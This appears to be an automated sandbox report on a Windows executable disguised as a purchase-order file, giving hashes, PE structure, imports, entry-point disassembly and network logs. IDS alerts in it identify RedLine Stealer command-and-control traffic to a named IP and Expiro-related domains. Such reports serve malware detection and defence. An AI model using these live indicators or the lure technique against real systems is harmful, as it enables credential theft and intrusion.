Preview:	....X...X.......................................X...!......................................t....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O..............^..#..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P............t............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Reputation:	unknown
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.955171533243245
TrID:	Win32 Executable (generic) a (10002005/4) 95.11% AutoIt3 compiled script executable (510682/80) 4.86% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
File size:	5'948'349 bytes
MD5:	e2ab6ff49774a8d73f56e95ea4b5fde9
SHA1:	2e4744a2bf1dd07ebb2b585afbc2d02227bf8ee7
SHA256:	829026e0d6a6f73f3328bb4aabd5f0e3f063f000cd9d860c051b307e148395d5
SHA512:	b5e0e8baf55a594d052d28746595e2ad8079c4b772001bea67097deb14ab803d126b3e2c221b7329cce381cc62819c59dbde625e9f28bc5726c4e2bf43ac722c
SSDEEP:	98304:f3v+7BujkcOSzSXuLdtpJr1EfvcX/csXT0i4cOamS2MxX/yCWmAdURML:ff+1ujkczXLnpHEna/0iTJVd9WmA6u
TLSH:	43562312F7D680FADD9335746937E72BDF3575294322C48BABE02EB68E11101973A361
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

File Icon


Icon Hash:	1733312925935517

Static PE Info

General

Entrypoint:	0x416310
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	aaaa8913c89c8aa4a5d93f06853894da

Entrypoint Preview

Instruction
call 00007FBEA8D7AEACh
jmp 00007FBEA8D6EC7Eh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FBEA8D6EE0Ah
cmp edi, eax
jc 00007FBEA8D6EFAAh
cmp ecx, 00000100h
jc 00007FBEA8D6EE21h
cmp dword ptr [004A94E0h], 00000000h
je 00007FBEA8D6EE18h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FBEA8D6EE0Ah
pop esi
pop edi
pop ebp
jmp 00007FBEA8D6F26Ah
test edi, 00000003h
jne 00007FBEA8D6EE17h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FBEA8D6EE2Ch
rep movsd
jmp dword ptr [00416494h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FBEA8D6EE0Eh
and eax, 03h
add ecx, eax
jmp dword ptr [004163A8h+eax*4]
jmp dword ptr [004164A4h+ecx*4]
nop
jmp dword ptr [00416428h+ecx*4]
nop
mov eax, E4004163h
arpl word ptr [ecx+00h], ax
or byte ptr [ecx+eax*2+00h], ah
and edx, ecx
mov al, byte ptr [esi]
mov byte ptr [edi], al
mov al, byte ptr [esi+01h]
mov byte ptr [edi+01h], al
mov al, byte ptr [esi+02h]
shr ecx, 02h
mov byte ptr [edi+02h], al
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FBEA8D6EDCEh

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[ASM] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8cd3c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab000	0x9298	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x82000	0x840	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x80017	0x80200	6c20c6bf686768b6f134f5bd508171bc	False	0.5602991615853659	data	6.634688230255595	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x82000	0xd95c	0xda00	f979966509a93083729d23cdfd2a6f2d	False	0.36256450688073394	data	4.880040824124099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x1a518	0x6800	e5d77411f751d28c6eee48a743606795	False	0.1600060096153846	data	2.2017649896261107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xab000	0x9298	0x9400	f6be76de0ef2c68f397158bf01bdef3e	False	0.4896801097972973	data	5.530303089784181	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab5c8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xab6f0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xab818	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xab940	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.48109756097560974
RT_ICON	0xabfa8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.5672043010752689
RT_ICON	0xac290	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.6418918918918919
RT_ICON	0xac3b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.7044243070362474
RT_ICON	0xad260	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.8077617328519856
RT_ICON	0xadb08	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.5903179190751445
RT_ICON	0xae070	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5503112033195021
RT_ICON	0xb0618	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6050656660412758
RT_ICON	0xb16c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7553191489361702
RT_MENU	0xb1b28	0x50	data	English	Great Britain	0.9
RT_DIALOG	0xb1b78	0xfc	data	English	Great Britain	0.6507936507936508
RT_STRING	0xb1c78	0x530	data	English	Great Britain	0.33960843373493976
RT_STRING	0xb21a8	0x690	data	English	Great Britain	0.26964285714285713
RT_STRING	0xb2838	0x43a	data	English	Great Britain	0.3733826247689464
RT_STRING	0xb2c78	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xb3278	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xb38d8	0x388	data	English	Great Britain	0.377212389380531
RT_STRING	0xb3c60	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.502906976744186
RT_GROUP_ICON	0xb3db8	0x84	data	English	Great Britain	0.6439393939393939
RT_GROUP_ICON	0xb3e40	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xb3e58	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xb3e70	0x14	data	English	Great Britain	1.25
RT_VERSION	0xb3e88	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xb4028	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll	WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL	EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll	HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll	DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll	DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll	SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-20T18:41:15.163662+0200	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.4	49735	TCP
2024-10-20T18:41:15.163662+0200	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.4	49735	TCP
2024-10-20T18:41:15.570147+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:15.570147+0200	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:15.786812+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	212.162.149.53	2049	192.168.2.4	49736	TCP
2024-10-20T18:41:18.588797+0200	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49740	18.141.10.107	80	TCP
2024-10-20T18:41:20.895056+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:21.104681+0200	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	212.162.149.53	2049	192.168.2.4	49736	TCP
2024-10-20T18:41:21.348286+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:21.558226+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:21.943828+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:22.062260+0200	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.4	61199	1.1.1.1	53	UDP
2024-10-20T18:41:22.983003+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:23.384051+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:23.599940+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:23.810494+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:23.952675+0200	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.4	53926	1.1.1.1	53	UDP
2024-10-20T18:41:24.109520+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:24.111716+0200	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.4	53837	1.1.1.1	53	UDP
2024-10-20T18:41:24.115224+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:25.058580+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:25.296983+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:26.032743+0200	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.4	50249	1.1.1.1	53	UDP
2024-10-20T18:41:26.258395+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:26.514504+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:26.728327+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:26.970938+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:27.301922+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:27.520050+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:27.736451+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:27.997658+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:28.215977+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:28.436154+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:28.695537+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:42:04.887694+0200	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.4	49806	TCP
2024-10-20T18:42:04.887694+0200	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.4	49806	TCP
2024-10-20T18:42:07.863126+0200	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.4	49827	TCP
2024-10-20T18:42:07.863126+0200	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.4	49827	TCP
2024-10-20T18:42:20.239335+0200	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49895	13.251.16.150	80	TCP
2024-10-20T18:42:39.898172+0200	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.211.97.45	80	192.168.2.4	49988	TCP
2024-10-20T18:42:39.898172+0200	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.211.97.45	80	192.168.2.4	49988	TCP
2024-10-20T18:43:12.270333+0200	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.213.104.86	80	192.168.2.4	50145	TCP
2024-10-20T18:43:12.270333+0200	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.213.104.86	80	192.168.2.4	50145	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 18:41:12.029104948 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:12.029138088 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:12.029202938 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:12.088944912 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:12.088960886 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:12.238667965 CEST	49731	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:12.243803024 CEST	80	49731	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:12.243884087 CEST	49731	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:12.244415998 CEST	49731	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:12.244455099 CEST	49731	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:12.249481916 CEST	80	49731	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:12.249589920 CEST	80	49731	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:12.881993055 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:12.882103920 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:12.885996103 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:12.886027098 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:12.886357069 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:12.937926054 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:12.985198021 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:13.031410933 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:13.047537088 CEST	49732	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:13.052632093 CEST	80	49732	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:13.052788019 CEST	49732	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:13.082602024 CEST	49732	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:13.082602024 CEST	49732	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:13.087713957 CEST	80	49732	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:13.087867975 CEST	80	49732	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:13.185184956 CEST	80	49731	54.244.188.177	192.168.2.4
